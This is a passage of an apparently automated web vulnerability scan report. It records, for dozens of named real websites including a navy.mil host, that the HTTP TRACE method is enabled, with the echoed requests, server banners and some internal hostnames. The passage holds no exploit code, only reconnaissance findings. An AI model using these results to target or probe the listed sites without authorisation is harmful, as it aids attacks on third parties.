Server: Apache/1.3.33 (Debian GNU/Linux) mod_tsunami/3.0 PHP/4.3.10-22 mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 5b6d30e36402547e
Host: www.billyland.com


26.55. http://www.bizhat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizhat.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bizhat.com
Cookie: 83bf4922dad86eaf

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:29 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bizhat.com
Cookie: 83bf4922dad86eaf


26.56. http://www.blazerforum.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blazerforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.blazerforum.com
Cookie: e5d1df5ef4672a97

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 PHP/5.2.6
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerAFUWEB_www_pool=1106972844.20480.0000; path=/

TRACE / HTTP/1.0
Host: www.blazerforum.com
Cookie: e5d1df5ef4672a97
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


26.57. http://www.bonhams.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bonhams.com
Cookie: 602bbbef0e67afb3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:31 GMT
Server: Apache
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: pubdb.nbs.uk.bonhams
Cookie: 602bbbef0e67afb3
Max-Forwards: 10
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.bonhams.com
X-Forwarded-Server: www.bonhams.com
Connection: Keep-Alive


26.58. http://www.boredpanda.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boredpanda.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.boredpanda.com
Cookie: 7cbd5e56440c5ada

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 7cbd5e56440c5ada
Host: www.boredpanda.com


26.59. http://www.buildyoursite2.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buildyoursite2.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.buildyoursite2.com
Cookie: 5e8678447daada0c

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.buildyoursite2.com
Cookie: 5e8678447daada0c


26.60. http://www.carfolio.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carfolio.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.carfolio.com
Cookie: db20de38e6b4a3de

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:02:01 GMT
Server: Apache/2.2.15 (Fedora)
Content-Type: message/http
Cache-Control: max-age=691200
Expires: Tue, 10 May 2011 00:02:00 GMT
Vary: Accept-Encoding
Connection: close

TRACE / HTTP/1.1
Host: www.carfolio.com
Cookie: db20de38e6b4a3de
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: www.carfolio.com
X-Forwarded-Server: www.carfolio.com
Connection: Keep-Alive


26.61. http://www.carsforagrand.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carsforagrand.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.carsforagrand.com
Cookie: acdb52c71f28bc82

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:07:06 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.carsforagrand.com
Cookie: acdb52c71f28bc82


26.62. http://www.cato-at-liberty.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cato-at-liberty.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cato-at-liberty.org
Cookie: e4aded3507b14d00

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:18 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cato-at-liberty.org
Cookie: e4aded3507b14d00


26.63. http://www.cci.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cci.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cci.edu
Cookie: 88a724472e271d77

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:37 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cci.edu
Cookie: 88a724472e271d77


26.64. http://www.celebtna.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebtna.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.celebtna.com
Cookie: 4e858e48bb4a90b4

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:27 GMT
Server: WebServerX
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.celebtna.com
Cookie: 4e858e48bb4a90b4


26.65. http://www.celebzilla.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebzilla.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.celebzilla.com
Cookie: 41811a4595a475e9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:25 GMT
Server: Apache/2.2.16 (EL)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.celebzilla.com
Cookie: 41811a4595a475e9


26.66. http://www.cellreception.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cellreception.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cellreception.com
Cookie: cac34fb6e1a95ed6

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:05:19 GMT
Server: Apache/2.0.46 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cellreception.com
Cookie: cac34fb6e1a95ed6


26.67. http://www.chattingallnight.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chattingallnight.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chattingallnight.com
Cookie: aefdafb2e90ce01e

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:23:07 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.chattingallnight.com
Cookie: aefdafb2e90ce01e


26.68. http://www.cheatcodesclub.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheatcodesclub.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cheatcodesclub.com
Cookie: fc20b20dcc837ffa

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:08 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cheatcodesclub.com
Cookie: fc20b20dcc837ffa


26.69. http://www.chessieland.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chessieland.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chessieland.com
Cookie: b081b2336ae6c817

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:08:58 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.chessieland.com
Cookie: b081b2336ae6c817


26.70. http://www.christnotes.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.christnotes.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.christnotes.org
Cookie: a4f48bd1ca9a41c2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.christnotes.org
Cookie: a4f48bd1ca9a41c2


26.71. http://www.chubbyaccess.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chubbyaccess.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.chubbyaccess.com
Cookie: bbfff6f0b420375c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:02 GMT
Server: Microsoft-IIS/5.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: bbfff6f0b420375c
Host: www.chubbyaccess.com


26.72. http://www.classfinders.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classfinders.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classfinders.com
Cookie: 5caec91b20fe3394

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:43:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.classfinders.com
Cookie: 5caec91b20fe3394


26.73. http://www.classof1976.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classof1976.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classof1976.net
Cookie: 1709e6299ae65ebb

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.classof1976.net
Cookie: 1709e6299ae65ebb


26.74. http://www.classyauto.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.classyauto.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.classyauto.com
Cookie: ac1f0bf8155b207a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.classyauto.com
Cookie: ac1f0bf8155b207a


26.75. http://www.coloradodirectory.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradodirectory.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coloradodirectory.com
Cookie: 9dc9958825edfce9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:22 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8o PHP/5.2.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coloradodirectory.com
Cookie: 9dc9958825edfce9


26.76. http://www.cooga.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cooga.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cooga.net
Cookie: 69e8e272d18ca6d6

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:44 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cooga.net
Cookie: 69e8e272d18ca6d6


26.77. http://www.copygator.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.copygator.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.copygator.com
Cookie: 2f695e59fa287e1d

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:02 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 2f695e59fa287e1d
Host: www.copygator.com


26.78. http://www.cramit.in/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramit.in
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cramit.in
Cookie: 28ac62b45fee0e62

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:52:22 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cramit.in
Cookie: 28ac62b45fee0e62


26.79. http://www.creditunionsonline.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditunionsonline.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.creditunionsonline.com
Cookie: 452256618f2f5a1b

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 22:51:54 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.creditunionsonline.com
Cookie: 452256618f2f5a1b


26.80. http://www.crengland.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crengland.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.crengland.com
Cookie: f28e498e701ebd7f

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:54:00 GMT
Server: Apache/2.2.8 (Win32) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_jk/1.2.26 PHP/5.2.9-2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.crengland.com
Cookie: f28e498e701ebd7f


26.81. http://www.cumminsforum.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cumminsforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.cumminsforum.com
Cookie: a69085336b56d970

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.cumminsforum.com
Cookie: a69085336b56d970


26.82. http://www.dallasguns.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dallasguns.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dallasguns.com
Cookie: b163f1fd5413e9da

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dallasguns.com
Cookie: b163f1fd5413e9da


26.83. http://www.dannyraycash.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dannyraycash.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dannyraycash.com
Cookie: b3d6e42a9fc898a8

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:38 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.11-0.dotdeb.0 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dannyraycash.com
Cookie: b3d6e42a9fc898a8


26.84. http://www.dells.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dells.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dells.com
Cookie: 4f27367c2b76f683

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:51:13 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dells.com
Cookie: 4f27367c2b76f683


26.85. http://www.dessert-models.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dessert-models.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dessert-models.net
Cookie: 9356a328e8351cdb

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 15:42:35 GMT
Server: Apache/2.2.17 (Win32) PHP/5.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dessert-models.net
Cookie: 9356a328e8351cdb


26.86. http://www.diabetesdaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesdaily.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.diabetesdaily.com
Cookie: b97210f2e7049fb2

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.5 SVN/1.6.9 Phusion_Passenger/2.2.11
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.diabetesdaily.com
Cookie: b97210f2e7049fb2


26.87. http://www.diabetesjournals.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesjournals.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.diabetesjournals.org
Cookie: 6dddf371c2b89446

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:47 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_jk/1.2.28 mod_ssl/2.2.14 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.diabetesjournals.org
Cookie: 6dddf371c2b89446


26.88. http://www.dittoseek.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dittoseek.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dittoseek.com
Cookie: fd531c9690564520

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:00:01 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dittoseek.com
Cookie: fd531c9690564520


26.89. http://www.donhr.navy.mil/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.donhr.navy.mil
Path:   /

Request

TRACE / HTTP/1.0
Host: www.donhr.navy.mil
Cookie: 637f75d69f2e908c

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:02:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.donhr.navy.mil
Cookie: 637f75d69f2e908c


26.90. http://www.downloadroute.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downloadroute.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.downloadroute.com
Cookie: bddca4f742aeda74

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:09 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.downloadroute.com
Cookie: bddca4f742aeda74


26.91. http://www.downv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downv.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.downv.com
Cookie: a798b6038a4fb519

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:17 GMT
Server: Microsoft-IIS/6.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a798b6038a4fb519
Host: www.downv.com


26.92. http://www.droiddog.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droiddog.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.droiddog.com
Cookie: d5fdd461e164d523

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:22:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.droiddog.com
Cookie: d5fdd461e164d523


26.93. http://www.drudge.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drudge.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.drudge.com
Cookie: e150ca02d7fe7d89

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:21 GMT
Server: Apache/2.2.17 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.drudge.com
Cookie: e150ca02d7fe7d89


26.94. http://www.dslservice-providers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dslservice-providers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dslservice-providers.com
Cookie: 54f01728c0858664

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dslservice-providers.com
Cookie: 54f01728c0858664


26.95. http://www.dvdizzy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dvdizzy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dvdizzy.com
Cookie: 82ae2a193b123f3a

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dvdizzy.com
Cookie: 82ae2a193b123f3a


26.96. http://www.dvorak.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dvorak.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.dvorak.org
Cookie: a1bbe53957d06d6c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:26 GMT
Server: Apache/2.2.14 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.dvorak.org
Cookie: a1bbe53957d06d6c


26.97. http://www.earlham.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earlham.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.earlham.edu
Cookie: 90fafeb4e65a09c3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:31 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.earlham.edu
Cookie: 90fafeb4e65a09c3


26.98. http://www.ebizroom.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebizroom.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ebizroom.com
Cookie: 943192226a2b787

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:49 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ebizroom.com
Cookie: 943192226a2b787


26.99. http://www.ecomodder.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ecomodder.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ecomodder.com
Cookie: 37ac711e4f3c7829

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:15 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ecomodder.com
Cookie: 37ac711e4f3c7829


26.100. http://www.edeals.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edeals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.edeals.com
Cookie: 59156cfdab068e53

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:39 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.edeals.com
Cookie: 59156cfdab068e53


26.101. http://www.ehso.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehso.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ehso.com
Cookie: 8316deb154dad36c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:04:06 GMT
Server: Apache/1.3.42 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 8316deb154dad36c
Host: www.ehso.com


26.102. http://www.eleadstracker.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eleadstracker.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.eleadstracker.com
Cookie: 336b77035ed26f14

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 132
X-Cacheable: YES
Date: Mon, 02 May 2011 00:11:07 GMT
X-Varnish: 2236532842
Age: 0
Via: 1.1 varnish
Connection: close
X-Served-By: mneme.sb03.com
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.eleadstracker.com
Cookie: 336b77035ed26f14
X-Varnish: 2236532842
X-Forwarded-For: 173.193.214.243


26.103. http://www.ephotozine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ephotozine.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ephotozine.com
Cookie: 859ae47aae592a33

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:51:03 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ephotozine.com
Cookie: 859ae47aae592a33


26.104. http://www.escapeartist.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.escapeartist.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.escapeartist.net
Cookie: 233c6e5f1bbaf5e

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.13
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.escapeartist.net
Cookie: 233c6e5f1bbaf5e


26.105. http://www.everyfreegame.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.everyfreegame.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.everyfreegame.net
Cookie: 70a4846ef95a40d1

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:30 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.everyfreegame.net
Cookie: 70a4846ef95a40d1


26.106. http://www.exclusive-pretens.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exclusive-pretens.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.exclusive-pretens.net
Cookie: 5f3ff2879d6c3cff

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 16:21:13 GMT
Server: Apache/2.2.17 (Win32) PHP/5.3.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.exclusive-pretens.net
Cookie: 5f3ff2879d6c3cff


26.107. http://www.expatforum.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expatforum.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.expatforum.com
Cookie: 61a5471f199e687c

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.expatforum.com
Cookie: 61a5471f199e687c


26.108. http://www.facepinch.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facepinch.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.facepinch.com
Cookie: 72386d0ea60b05ae

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:16 GMT
Server: Apache/2.2.17 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.facepinch.com
Cookie: 72386d0ea60b05ae


26.109. http://www.famegame.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famegame.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.famegame.com
Cookie: 867d279912539746

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 126
Date: Mon, 02 May 2011 00:50:12 GMT
X-Varnish: 693068340
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

TRACE / HTTP/1.0
Host: www.famegame.com
Cookie: 867d279912539746
X-Varnish: 693068340
X-Forwarded-For: 173.193.214.243


26.110. http://www.famousfantasy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famousfantasy.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.famousfantasy.com
Cookie: 25efb77271486d38

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:44 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.famousfantasy.com
Cookie: 25efb77271486d38


26.111. http://www.fashionbombdaily.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashionbombdaily.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.fashionbombdaily.com
Cookie: 90a2f96cc8ab7bdc

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.fashionbombdaily.com
